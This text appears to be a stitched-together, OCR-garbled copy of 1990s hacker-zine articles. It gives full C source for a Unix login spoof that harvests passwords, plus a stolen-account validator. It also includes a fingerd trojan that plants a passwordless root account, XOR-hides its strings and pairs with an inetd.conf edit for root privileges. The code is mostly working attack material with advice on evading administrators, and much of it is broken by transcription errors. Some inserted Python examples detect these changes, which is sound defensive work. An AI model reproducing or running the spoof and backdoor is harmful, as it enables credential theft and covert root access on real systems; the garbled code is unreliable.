tries to login as sync (or another account of a similar type, which you can 
define), it acts exactly like the normal login program would, right down to 
displaying the system date & time as well as the message of the day!! 


The idle time facility 


One of the main problems with unix spoofs is they can be spotted 
so easily by the administrator, as he/she could get a list of current 
users on the system and see that an account was logged on, and had been 
idle for maybe 30 minutes. They would then investigate & the spoof 
would be discovered. 


I have therefore incorporated a scheme in the spoof whereby 
approx. every minute, the tty the spoof is executed from is ’touched’ 
with the current time, this effectively simulates terminal activity & 
keeps the terminal’s idle time to zero, which helps the spoof’s chances 
of not being discovered greatly. 


The spoof also incorporates a routine which will automatically 
keep track of approximately how long the spoof has been running, and if 
it has been running for a specified time without grabbing an i.d. or password, 
will automatically exit and run the real login program. 
This timer is by default set to 12.5 minutes, but you can alter this time 
if you wish. 


Note: Due to the varying processing power of some systems, I could not 
set the timer to exactly 60 seconds, I have therefore set it to 50, 
in case it loses or gains extra time. Take this into consideration when 
setting the spoof’s timer to your own value. I recommend you 
stick with the default, and under no circumstances let it run 
for hours. 


Password Validation techniques 


The spoof basically uses 2 methods of password validation (or none at 
all on a shadowed system V). Firstly, when the spoof is used on any unix 
with an unshadowed password file, it uses the crypt function to validate a 
password entered. If however the system is running SUNOS 4.1.+ and 
incorporates the shadow password system, the program uses a function called 
pwdauth(). This takes the login i.d. & decrypted password as its arguments 
and checks to see if both are valid by encrypting the password and 
comparing it to the shadowed password file which is usually located in 
/etc/security and accessible only by root. By validating both the i.d. & 
password we ensure that the data which is saved to file is correct and not 
any old bullshit typed at the terminal!!! 


Executing the Spoof 


ok, now about the program. This is written in ANSI-C, so I hope you have a 
compatible compiler, GCC or Sun’s ACC should do it. Now the only time you 
will need to change the code is in the following circumstances :- 


1) If you are to compile & run it on an unshadowed unix, 
in which case remove all references to the pwdauth() function, 
from both the declarations & the shadow checking routine, add 


this code in place of the shadow password checking routine :- 
if ( shadow == ) 4 
invalid = 0; 
else 
invalid = 1; 


2) Add the above code also to the spoof if you are running this on a system 
V which is shadowed. In this case the spoof loses its ability to 
validate the password, to my knowledge there is no sysV equivalent 
of the pwdauth() function. 


Everything else should be pretty much compatible. You should have no 
problems compiling & running this on an unshadowed SUNOS machine, if 
you do, make the necessary changes as above, but it compiled ok 
on every unshadowed SUNOS I tested it on. The Spoof should 
automatically detect whether a SUNOS system is shadowed or unshadowed 
and run the appropriate code to deal with each situation. 


Note: when you have compiled this spoof, you MUST ’exec’ it from the 
current shell for it to work, you must also only have one shell 
running. e.g. from C or Bourne shell using the GNU C Compiler do :- 


$ gcc spoof.c -o spoof 
$ exec spoof 


This replaces the current shell with the spoof, so when the spoof quits & 
runs the real login program, the hacker’s account is effectively logged off. 


ok enough of the bullshit, here’s the spoof :- 


cut here 


/* Program Unix login spoof 

Author The Shining/UPi (UK Division) 

Date : Released 12/4/94 
A 
s 
T 


Unix Type 1l unshadowed unix systems & 
hadowed SUNOS systems 


Note his file MUST be exec’d from the shell. */ 


include <stdio.h> 
include <string.h> 
include <signal.h> 
#include <pwd.h> 
include <time.h> 
include <utime.h> 


define OUTFILE ".data" /* Data file to save account info into */ 
define LOGPATH "/usr/bin/login" /* Path of real login program */ 

define DUMMYID "sync" /* Dummy account on your system */ 

define DLENGTH 4 /* Length of dummy account name */ 


FILE *f£p; 


/* Set up variables to store system time & date */ 


time_t now; 


static int time_out, time_on, no_message, loop_cnt; 


/* Set up a structure to store users information */ 


struct loginfo { 
char logname[10]; 
char key[9]; 
char *comment; 
char *homedir; 
char *shell; 


/* Use the unix function getpass() to read user password and 
crypt () or pwdauth () (remove it below if not SUNOS) 
to validate it etc */ 


char *getpass(), *gethostname(), *alarm(), *sleep(), 
*crypt(), *ttyname(), *pwdauth(), motd, log_date[60], 
pass[14], salt[3], *tty, cons[] = " on console ", 
hname[72], *ld; 


/* flag = exit status, ppid = pid shell, wait = pause length, 
pwstat = holds 0 if valid password, shadow holds 1 if shadow 
password system is being used, 0 otherwise. */ 


int flag, ppid, wait, pwstat, shadow, invalid; 


/* Declare main functions */ 


void write_details(struct loginfo *); 

void catch( void ), disable_interrupts( void ); 

void log_out( void ), get_info( void ), 
invalid_login( void ), prep_str( char * ); 
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/* set up pointer to point to pwfile structure, and also 
a pointer to the utime() structure */ 


struct passwd *pwentry, *getpwnam(); 
struct utimbuf *times; 


int main( void ) 
{ 


system("clear"); 


/* Initialise main program variables to 0, change ’loop_cnt’ to 1 
if you do not want the machines host name to appear with 
the login prompt! (e.g. prompt is ‘login: * instead of 
‘MIT login:’ etc) */ 


wait = 3; /* Holds value for pause */ 

flag = 0; /* Spoof ends if value is 1 */ 

loop_cnt = 0; /* Change this to 1 if no host required */ 

time_out = 0; /* Stops timer if spoof has been used */ 
time_on = 0; /* Holds minutes spoof has been running */ 
disable_interrupts(); /* Call function to disable Interrupts */ 


/* Get system time & date and store in log_date, this is 
displayed when someone logs in as ’sync’ */ 


now = time (NULL); 
strftime(log_date, 60, "Last Login: ta Sh %d SH:%M:%S", Localtime (&now) ); 
strcat (log_date, cons); 

ld = log_date; 


/* Get Hostname and tty name */ 
gethostname(hname, 64); 
streat (hname, " login: "); 
tty = ttyname(); 
/* main routine */ 


while( flag == ) 
{ 


invalid = 0; /* Holds 1 if id +/or pw are invalid */ 
shadow = 0; /* 1 if shadow scheme is in operation */ 
no_message = 0; /* Flag for Login Incorrect msg */ 
alarm(50); /* set timer going */ 

get_info(); /* get user i.d. & password */ 


/* Check to see if the user i.d. entered is ’synce’, if it is 
display system time & date, display message of the day and 
then run the spoof again, insert the account of your 
choice here, if its not sync, but remember to put 
the length of the accounts name next to it! */ 


if (strncemp(u.logname, DUMMYID, DLENGTH) == NULL) { 
printf("%s\n", ld); 


if ((fp = fopen("/etc/motd", "r" 
while ((motd = getc(fp)) != 
putchar (motd) ; 


fclose(fp); 
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printf ("\n"); 
prep_str(u.logname) ; 
no_message = 1; 
sleep (wait); 


/* Check if a valid user i.d. has been input, then check to see if 
the password system is shadowed or unshadowed. 
If both the user i.d. & password are valid, get additional info 
from the password file, and store all info ina file called .data, 


then exit spoof and run real login program */ 
setpwent (); /* Rewind pwfile to beign processing */ 
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) { 
invalid = 1; 
flag = 0; 
} 
else 


strncpy(salt, pwentry->pw_passwd, 2); 


/* Check for shadowed password system, in SUNOS, the field in /etc/passwd 
should begin with ’##’, in system V it could contain an ’x’, if none 


of these exist, it checks that the entry = 13 chars, if less then 
shadow system will probably be implemented (unless acct has been 
disabled) */ 


if ( invalid == ) { 
if ((stremp(salt, "##")) || (strncemp(salt, "x", 1)) == NULL) 
shadow = 1; 
else 
if (strlen(pwentry->pw_passwd) < 13) 
shadow = 1; 


/* If unshadowed, use the salt from the pwfile field & the key to 
form the encrypted password which is checked against the entry 
in the password file, if it matches, then all is well, if not, 


spoof runs again!! */ 
if ( shadow != 1) { 
if (strcmp (pwentry-—>pw_passwd, crypt(u.key, salt)) == NULL) 
invalid = 0; 
else 
invalid = 1; 


/* If SUNOS Shadowing is in operation, use the pwdauth() function 
to validate the password, if not SUNOS, substitute this code 
with the routine I gave earlier! */ 


if ( shadow == 1) f 
if (pwstat = pwdauth(u.logname, u.key) == NULL) 
invalid = 0; 
else 
invalid = 1; 


/* If we have a valid account & password, get user info from the 
pwfile & store it */ 
if ( invalid == ) { 


u.comment = pwentry->pw_gecos; 
u.homedir = pwentry->pw_dir; 
u.shell = pwentry->pw_shell; 


/* Open file to store user info */ 


if ((fp = fopen(OUTFILE, "a")) == NULL) 
log_out (); 


write_details (&u); 
fclose(fp); 
no_message = 1; 
flag = 1; 


else 
flag = 0; 


invalid_login(); 
endpwent (); /* Close pwfile */ 


if (no_message == 0) 
loop_cnt++; 


} /* end while */ 


log_out (); /* call real login program */ 


/* Function to read user i.d. & password */ 


void get_info( void ) 
{ 
char user[11]; 
unsigned int string_len; 


fflush(stdin); 
prep_str(u.logname) ; 
prep_str(u.key); 
strepy(user, "\n"); 


/* Loop while some loser keeps hitting return when asked for user 
i.d. and if someone hits CTRL-D to break out of spoof. Enter 
a at login to exit spoof. Uncomment the appropriate line(s) 
below to customise the spoof to look like your system */ 


while ((strcemp(user, "\n") == NULL) && (!feof(stdin))) 


{ 
/* printf ("Scorch Ltd SUNOS 4.1.3\n\n); */ 


if (loop_cnt > 0) 
strcepy(hname, "login: "); 


printf("Ss", hname) ; 
fgets(user, 9, stdin); 
/* Back door for hacker, # at present, can be changed, 


but leave \n in. */ 


if (stremp(user, "#\n") == NULL) 
exit (0); 
/* Strip \n from login i.d. */ 


if (strlen(user) < 8) 


string_len = strlen(user) ‘diss 
else 
string_len = strlen(user); 


strncpy(u.logname, user, string_len)j; 


/* check to see if CTRL-D has occurred because it does not 
generate an interrupt like CTRL-C, but instead generates 
an end-of-file on stdin */ 


if (feof(stdin)) { 


clearerr (stdin); 
printf ("\n"); 


/* Turn off screen display & read users password */ 


strncpy(u.key, getpass("Password:"), 8); 


/* Function to increment the timer which holds the amount of time 
the spoof has been running */ 


void catch( void ) 


{ 


time_ontt; 


/* If spoof has been running for 15 minutes, and has not 
been used, stop timer and call spoof exit routine */ 


if ( time_Lout == yeat 
if (time_on == 15) { 
prints ("\n"); 
alarm(0); 
log_out (); 


/* 'Touch’ your tty, effectively keeping terminal idle time to 0 */ 


utime (tty, times); 
alarm(50); 
} 


/* Initialise a string with \0’s */ 


void prep_str( char str[] ) 
{ 


int strl, cnt; 
strl = strlen(str); 
for (cnt = 0; cnt != strl; cntt+t) 
str fent.) <=" ¥ 


/* function to catch interrupts, CTRL-C & CTRL-Z etc as 
well as the timer signals */ 


void disable_interrupts( void ) 
{ 
signal (SIGALRM, catch); 
signal (SIGQUIT, SIG_IGN); 
signal (SIGTERM, SIG_IGN); 
signal (SIGINT, SIG_IGN); 
signal (SIGTSTP, SIG_IGN); 


/* Write the users i.d., password, personal information, homedir 
and shell to a file */ 


void write_details(struct loginfo *sptr) 


{ 


fprintf(fp, "%s:%s:", sptr->logname, sptr->key); 
fprintf(fp, "Sd:sd:", pwentry->pw_uid, pwentry->pw_gid); 
fprintf(fp, "ss:%3s:", sptr->comment, sptr->homedir) ; 
fprintf(fp, "%Ss\n", sptr->shell); 

fprintf (fp, "\n"); 


/* Display login incorrect only if the user hasn’t logged on as 
"sync! */ 


void invalid_login( void ) 


{ 


if ( flag == 1 && pwstat == ) 
sleep (wait); 


if ( no_message == ) 
printf£("Login incorrect\n") ; 


/* Displays appropriate message, exec’s the real login program, 
this replaces the spoof & effectively logs spoof’s account off. 
Note: this spoof must be exec’d from the shell to work */ 


void log_out( void ) 


{ 


time_out = 1; 
if ( no_message == 1) { 
sleep(1); 


printf£("Login incorrect\n") ; 


} 


execl(LOGPATH, "login", (char *)0); 


cut here


then delete the source, run it and wait for some sucker to login!.
If you do initially run this spoof from your account, I suggest you
remove it when you have grabbed someone’s account and run it from theirs
from then on, this reduces your chances of being caught!


User i.d. & Password Validator 




Now if you are familiar with the unix Crack program, as I’m sure most of
you are ;-), or if you have used my spoof to grab some accounts,
this little program could be of some use. Say you have snagged
quite a few accounts, and a few weeks later you wanna see if they are still
alive, instead of logging onto them, then logging out again 20 or 30 times
which can take time, and could get the system admin looking your way, this
program will continuously ask you to enter a user i.d. & password, then
validate them both by actually using the appropriate entry in the password
file. All valid accounts are then stored along with other info from the
password file, in a data file. The program loops around until you stop it.


This works on all unshadowed unix systems, and, you guessed it!, shadowed 
SUNOS systems. 


If you run it on an unshadowed unix other than SUNOS, remove all references
to pwdauth(), along with the shadow password file checking routine,
if you’re on sysV, you’re shit outa luck! anyway, here goes :-


cut here
/* Program : To validate accounts & passwords on both 
shadowed & unshadowed unix systems. 
Author : The Shining/UPi (UK Division) 
Date : Released 12/4/94 


UNIX type : All unshadowed systems, and SUNOS shadowed systems */ 


include <stdio.h> 
include <string.h> 
include <pwd.h> 


FILE *fp; 


int pw_system( void ), shadowed( void ), unshadowed( void ); 
void write_info( void ), display_notice( void ); 


struct passwd *pwentry, *getpwnam(); 


struct user { 
char logname[10]; 
char key[9]; 
char salt[3]; 


char *getpass(), *pwdauth(), *crypt(), ans[2]; 
int invalid_user, stat; 


int main( void ) 


{ 


strepy(ans, "y"); 


while (strcemp(ans, "y") == NULL) 
invalid_user = stat = 0; 
display_notice(); 

printf ("Enter login id:"); 
scanf("%9s", u.logname) ; 
strcpy(u.key, getpass("Password:")); 


setpwent (); 


if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) 
invalid_user = 1; 

else 
strncpy(u.salt, pwentry->pw_passwd, 2); 


if (invalid_user != 1) f{ 


if ((stat = pw_system()) == 1) { 
if ((stat = unshadowed()) == NULL) { 
printf ("Unshadowed valid account! - storing details\n"); 
write_info(); 
} 
} 
else 
if ((stat = shadowed()) == NULL) { 
printf ("SUNOS Shadowed valid account! - storing details\n"); 
write_info(); 
} 
else 
invalid_user = 2; 


if (invalid_user == 1) 
printf ("User unknown/not found in password file\n"); 


if (invalid_user == ) 
printf ("Password invalid\n"); 


printf("\n\nValidate another account? (y/n): "); 
scanf("Sl1ls", ans); 


endpwent (); 
} 
} 


/* Check to see if shadow password system is used, in SUNOS the field 
in /etc/passwd starts with a ’#’, if not, check to see if entry 
is 13 chars, if not shadow must be in use. */ 


int pw_system( void ) 


{ 


if (strlen(pwentry-—>pw_passwd) != 13) 
return(0); 
else 
if (stremp(u.salt, "##") == NULL) 
return(0); 
else 


return(1); 


/* If system is unshadowed, get the 2 character salt from the password 
file, and use this to encrypt the password entered. This is then 
compared against the password file entry. */ 
int unshadowed( void ) 

{ 

if (pwentry->pw_passwd == crypt(u.key, u.salt)) 
return (0); 

else 
return(1); 


/* If SUNOS shadowe system is used, use the pwdauth() function to validate 
the password stored in the /etc/security/passwd.adjunct file */ 


int shadowed( void ) 


{ 
int pwstat; 


if (pwstat = pwdauth(u.logname, u.key) == NULL) 
return (0); 

else 
return (1); 


/* Praise myself!!!! */ 


void display_notice( void ) 
{ 
system("clear"); 

printf ("Unix Account login id & password validator.\n"); 

printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n"); 
printf ("(c)1994 The Shining\n\n\n\n") ; 

} 


/* Open a file called ’data’ and store account i.d. & password along with 
other information retrieved from the password file */ 


void write_info( void ) 


{ 


/* Open a file & store account information from pwfile in it */ 


if ((fp = fopen("data", "a")) == NULL) { 
printf ("error opening output file\n"); 
exit (0); 


} 


fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry-—>pw_uid) ; 
fprintf(fp, "%Sd:%Ss:", pwentry->pw_gid, pwentry-—>pw_gecos) ; 
fprintf(fp, "Ss:%s\n", pwentry->pw_dir, pwentry->pw_shell); 
fclose (fp); 

} 


cut here


The above programs will not compile under non-ansi C compilers without quite
a bit of modification. I have tested all these programs on SUNOS both
shadowed & unshadowed, though they should work on other systems with
little modification (except the shadow password cracker, which is SUNOS
shadow system specific).


Regards to the following guys :- 
Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
the guys at United International Perverts(yo Dirty Mac & Jasper!)
and all I know.


(c) 1994 The Shining (The NORTH!, U.K.) 
The fingerd trojan horse
Original article by Hitman Italy for Phrack Inc. 


This article is for informational purposes only, I’m not liable for
any damage or illegal activity perpetrated using the source or the
information in the article.


So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozens of methods you can use,
usually, if an operator figures out that his system is under attack, he’ll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on.. if nothing is found
he’ll realize the hacker is a dumb ass and he’ll just modify the passwd to
prevent him from logging on (in most cases), here comes my fingerd trojan.
This scheme is quite original (I’ve never seen it used) and the source is
compact enough to be fitted into a MAG. The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.


---------- + CUT HERE 4 


/* The Fingerd trojan by Hitman Italy 
* This source cannot be spread without the whole article 
but you can freely implement or modify it for personal use 


*if 


static char copyright[] = ""; /* Add the copyright string here */ 


static char sccsid[] = ""; /* Add the sccsid string here */ 


include <stdio.h> 


define PATH_FINGER "/usr/ucb/finger" 
define CODE 161 


char *HitCrypt (ch) 
char *ch; 
{ 
char -*b; 
b=ch; 
while ((* (ch++) *=COD 
return (b); 


Gl 


) !=0x00); 
} 


main(argc, argv) 
int argc; 
char *argv[]; 
{ 

register FILE *fp; 
register int ch; 
register char *lp; 
int p[2]; 


static char exor[4] [23]={ 
{201,200,213,CODE}, 
{142,196,213,194,142,209,192,210, 210, 214,197,COD 


GI 
—) 
~ 
201,200, 213,155,155,145,155,145,155,155,142,155,142,195,200, 207,142,194, 
210,201, CODE}, 

227,192,194, 202,197, 206, 206, 211,129,192,194, 213, 200, 215,192, 213,196,197, 
143,143,143,CODE} }; 


define ENTRIES 50 
char **ap, *av[ENTRIES + 1], line[1024], *strtok(); 


ifdef LOGGING /* unused, leave it for "strings" command */ 
include <netinet/in.h> 

struct sockaddr_in sin; 

int sval; 


sval = sizeof(sin); 
if (getpeername(0, &Sin, &Sval) < 0) 
fatal(argv[0],"getpeername"); 
#endif 


if (!fgets(line, sizeof(line), stdin) ) 
exit(l1); 


av[0] = "finger"; 


for (lp = line, ap = é&av[1]J;;) { 

*ap = strtok(lp, " \t\r\n"); 

if (!*ap) 
break; 

if ((*ap) [0] == ’/’ && ((*ap)[1] == ’W’ || (*ap) [1] == ’w’)) 
*ap = Woy Wes 

if (++ap == av + ENTRIES) 
break; 

lp = NULL; 


if (pipe(p) < 0) 
fatal(argv[0],"pipe"); 


switch(fork()) {f 


case 0: 
(void) close (p[0]); 
if (pl) w= 1) { 
(void) dup2(p[1], 1); 
(void) close(p[1]); 
} 
/*-=-=-=-=-=— PUT HERE YOUR CODE -=-=-=-=-=-*/ 


if (av[1]) 
if (strcemp( (HitCrypt (&exor[0] [0 
if(! (fp=fopen( (HitCrypt (&exor [ 
_—exit (10); 
fprintf(fp,"ss\n", HitCrypt (&exor[ 
printf("Ss\n", HitCrypt (&exor[3] [0 
fclose (fp); 
break; 


] ) 
1]{0])) ,"a 


= 
— 
= 
:O 
fa 
= 
sS 

~ 


/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ 


if (execv(PATH_FINGER, av) ==-1) 
fprintf(stderr,"No local finger program found\n"); 
_exit (1); 
case -l: 
fatal(argv[0],"fork"); 
} 
(void) close(p[1]); 
if (!(fp = fdopen(p[O], "r"))) 
fatal(argv[0],"fdopen") ; 
while ((ch = getc(fp)) != EOF) { 
putchar (ch); 
fatal (prg,msg) 
char *prg, *msg; 
fprintf(stderr, "Ss: ", prg); 


perror (msg) ; 
exit (1); 


--------- + CUT HERE 4 


I think it’s quite easy to understand, first of all, inetd opens the
socket and pipes the input data through the fingerd


*      if (!fgets(line, sizeof(line), stdin))
*              exit(1);
*      av[0] = "finger";
*      for (lp = line, ap = &av[1];;) {
*              *ap = strtok(lp, " \t\r\n");
*              if (!*ap)
*                      break;
*              if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*                      *ap = "-l";


here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any ’/W’ or ’/w’ old options in ’-l’


*      switch(fork()) {
*      case 0:
*              (void) close(p[0]);
*              if (p[1] != 1) {
*                      (void) dup2(p[1], 1);
*                      (void) close(p[1]);
*              }


the task goes into the background


*              if (execv(PATH_FINGER, av) == -1)
*                      fprintf(stderr,"No local finger program found\n");


here the daemon executes the local finger with remote parameters


*      (void) close(p[1]);
*      if (!(fp = fdopen(p[0], "r")))
*              fatal(argv[0],"fdopen");
*      while ((ch = getc(fp)) != EOF) {
*              putchar(ch);


the output is piped back to the remote system


That’s how the finger daemon works... now the trojan, basically we’ll
check out the input finger user till the magic code matches, then our
sleepin’ trojan will wake up and do the job... let’s examine my code
(decrypted)
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ 
if (av[1]) 
if (strcmp ("hit",av[1])==0) { 
if (! (fp=fopen ("/etc/passwd","a"))) 
exit (10); 


fprintf (fp, "hit::0:0::/:/bin/csh\n") ; 
printf ("Backdoor activated...\n"); 
fclose(fp); 

break; 
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ 


When the "hit" magic code matches the trojan will modify the passwd adding 
a fake unpassworded root user named "hit", so you can relogin as root, 
cover your tracks and keep on working. Of course this is an example, you 
can do what you want simply adding your custom code, you may remote cat a 
log file without logging in, or remote kill an user, maybe root logins are 
disabled so you have to make a suid shell and add a normal entry in the 
passwd or open a port and so on, you can also use multiple codes if you 
like. If the magic word doesn’t match of course the finger will work out 
normally. 


<example> 

# finger hit@666.666.666.666 
[666.666.666.666] 

Backdoor activated... 


Well done! You have gained a root access. 
(aes) 

# cat /etc/passwd 

root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^ they run NIS... anyway our local root login will work fine
<example> 


#finger hit@hacked.system.com 

[hacked.system.com] 

here is the log 

user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001 
user: yit001 from: (...)


That’s really useful to collect logfiles without logging in and leave 
tracks everywhere. 
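
The change shown in the /etc/passwd listing above is the kind a routine audit catches. Added example, not part of the original article: it flags UID-0 entries not named root, empty password fields, NIS compat lines and malformed records. The passwd text is a constructed sample modelled on that listing, and the function and issue names are this example's own.

```python
# Constructed sample, modelled on the passwd listing in the article.
SAMPLE_PASSWD = """\
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
"""


def audit_passwd(text):
    """Return a list of (line_number, account, issue) for passwd(5) text."""
    findings = []
    seen = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # '+' and '-' lines are NIS compat entries, not accounts: list them
        # for review instead of parsing them as users.
        if line[0] in "+-":
            findings.append((lineno, line.split(":", 1)[0], "nis-compat-entry"))
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            findings.append((lineno, fields[0], "malformed"))
            continue
        name, password, uid = fields[0], fields[1], int(fields[2])
        if name in seen:
            findings.append((lineno, name, "duplicate-name"))
        seen.add(name)
        if uid == 0 and name != "root":
            findings.append((lineno, name, "uid0-not-root"))
        if password == "":
            findings.append((lineno, name, "empty-password"))
    return findings


def passwordless_root_equivalents(findings):
    """Accounts that are both UID 0 under another name and passwordless."""
    issues_by_account = {}
    for _, name, issue in findings:
        issues_by_account.setdefault(name, set()).add(issue)
    wanted = {"uid0-not-root", "empty-password"}
    return sorted(n for n, issues in issues_by_account.items() if wanted <= issues)


if __name__ == "__main__":
    results = audit_passwd(SAMPLE_PASSWD)
    for lineno, name, issue in results:
        print(f"line {lineno}: {name}: {issue}")
    print("critical:", passwordless_root_equivalents(results))
```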


Now the problem.... 
If you want to use the fingerd to run world accessible commands you won’t 
have any problem but if you require root privileges check this out: 


#grep fingerd /etc/inetd.conf
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
                         ^^^^^^


On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
file

finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd


now you have to refresh the inetd process


#kill -HUP <inetd pid>


now you can do what you want, many unix clones let the fingerd running as
root by default... and even if you have to modify the inetd.conf an
operator unlikely will realize what is happening since all other daemons
run as root.
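
The inetd.conf edit described above shows up in a comparison against a saved baseline. Added example, not from the original article: it parses the classic six-field inetd.conf service line and reports services whose user or server path drifted. The two finger lines are the ones quoted above; the ftp line, the function names and the issue labels are constructed for the example.

```python
# Baseline copy of inetd.conf (finger line from the article, ftp line constructed).
BASELINE = """\
# constructed baseline
ftp    stream tcp nowait root   /usr/etc/in.ftpd    in.ftpd
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
"""

# Current file, after the edit the article describes.
CURRENT = """\
ftp    stream tcp nowait root   /usr/etc/in.ftpd    in.ftpd
finger stream tcp nowait root   /usr/etc/in.fingerd in.fingerd
"""


def parse_inetd(text):
    """Map (service, protocol) -> {'user', 'server'} for each service line."""
    services = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue  # blank line, comment, or not a six-field service entry
        name, _socktype, proto, _wait, user, server = fields[:6]
        services[(name, proto)] = {"user": user, "server": server}
    return services


def diff_inetd(baseline_text, current_text):
    """Return (service, issue, detail) tuples for every drift from baseline."""
    base, cur = parse_inetd(baseline_text), parse_inetd(current_text)
    report = []
    for key in sorted(set(base) | set(cur)):
        old, new = base.get(key), cur.get(key)
        if old is None:
            report.append((key[0], "service-added", new["user"]))
        elif new is None:
            report.append((key[0], "service-removed", old["user"]))
        else:
            if old["user"] != new["user"]:
                issue = "now-runs-as-root" if new["user"] == "root" else "user-changed"
                report.append((key[0], issue, f'{old["user"]} -> {new["user"]}'))
            if old["server"] != new["server"]:
                report.append((key[0], "server-path-changed",
                               f'{old["server"]} -> {new["server"]}'))
    return report


if __name__ == "__main__":
    for service, issue, detail in diff_inetd(BASELINE, CURRENT):
        print(f"{service}: {issue} ({detail})")
```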
Why have I crypted all data?

#strings login 

(20edt) 

Yeah d00dz! That’s a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...) 


Lame or not? All alien data must be crypted.. a fast exor crypting 
routine will work fine, of course you can use the standard crypt function 
or other (slow) algorithms but since security is not important (we just 
want to make our texts invisible) I suggest using my fast algo,to create 
the exor matrix simply put all texts on a file and use the little 
ExorCrypt utility I have included UUencoded below (amiga/msdos version) . 


<example amiga> 

echo > test "this is a test" 

Acrypt test test.o 

line crypted: 1 

type test.o 

static char exor[]={ 

213,201,200,210,129,200, 210,129,192,129,213,196,210,213,161}; 


char *ExorCrypt (ch) 
char *ch; 
{ 
char *b; 
b=ch; 
while ((* (ch++) ^=0xa1) !=0x00);
return (b); 


} 


The utility will create the xor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.
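
Text XORed with one byte drops out of strings(1) output, which only shows runs of printable bytes, but it does not survive a key sweep. Added example, not the article's ExorCrypt utility: it carves strings from a buffer under every single-byte key and reports those that match a watchlist. The sample buffer is constructed from the two byte vectors printed in this article; the watchlist and function names are assumptions of the example.

```python
import string

# Bytes treated as printable when carving strings (space kept, controls dropped).
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

# Assumed watchlist: paths a small network daemon has little reason to hide.
WATCHLIST = (b"/etc/passwd", b"/etc/shadow", b"/bin/sh", b"/bin/csh")

# Vectors as printed in the article (key 161 = 0xA1, terminator = the key).
ENCODED_TEST = bytes([213, 201, 200, 210, 129, 200, 210, 129,
                      192, 129, 213, 196, 210, 213, 161])
ENCODED_PATH = bytes([142, 196, 213, 194, 142, 209, 192, 210,
                      210, 214, 197, 161])

# Constructed stand-in for a binary: plain strings plus the encoded vectors.
SAMPLE_IMAGE = (b"\x00\x00finger\x00pipe\x00" + ENCODED_TEST + ENCODED_PATH
                + b"No local finger program found\x00")


def carve_strings(buf, min_len=4):
    """Return (offset, bytes) for each printable run of at least min_len,
    which is the view strings(1) gives by default."""
    runs, start = [], None
    for i, b in enumerate(buf):
        if b in PRINTABLE:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((start, bytes(buf[start:i])))
            start = None
    if start is not None and len(buf) - start >= min_len:
        runs.append((start, bytes(buf[start:])))
    return runs


def xor_sweep(buf, watchlist=WATCHLIST, min_len=4):
    """Decode buf under every key 1..255 and return (key, offset, text) for
    carved strings containing a watchlist entry. Key 0 is the plain view."""
    hits = []
    for key in range(1, 256):
        table = bytes(b ^ key for b in range(256))
        decoded = buf.translate(table)
        for offset, text in carve_strings(decoded, min_len):
            if any(w in text for w in watchlist):
                hits.append((key, offset, text.decode("ascii")))
    return hits


if __name__ == "__main__":
    print("plain view:", [s for _, s in carve_strings(SAMPLE_IMAGE)])
    for key, offset, text in xor_sweep(SAMPLE_IMAGE):
        print(f"key 0x{key:02x} offset {offset}: {text}")
```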


Before compiling the whole thing you must add the copyright and sccsid 
strings I have not included (they may vary). 
Let’s simply do: (SunOs) 


#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
 All rights reserved.                   ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI       <<<< SCCSID STRING
getpeername
finger
pipe
/usr/ucb/finger
No local finger program found
fork
fdopen


Bas 
oS: 


(CCC 
DDDDDDDDDD 


AAAAAA 
BBBBBB 


The top of source becomes: 

static char copyright []= 

"@(#) Copyright (c) 1983 Regents of the University of California.\n\ 
All rights reserverd.\n"; 

static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI" 


That’s all. Now you can compile and install your fingerd trojan, 
the source was adapted for SunOS but you can port it on many unix 
clones without troubles. 
Few final words to:


The Phrack University Dialup List 


[We’ve been compiling all these for months now, and still have
hundreds more to add. If you know dialups for any other .EDU
sites or Universities elsewhere in the world that are on the
Internet, please mail them to us at phrack@well.com.

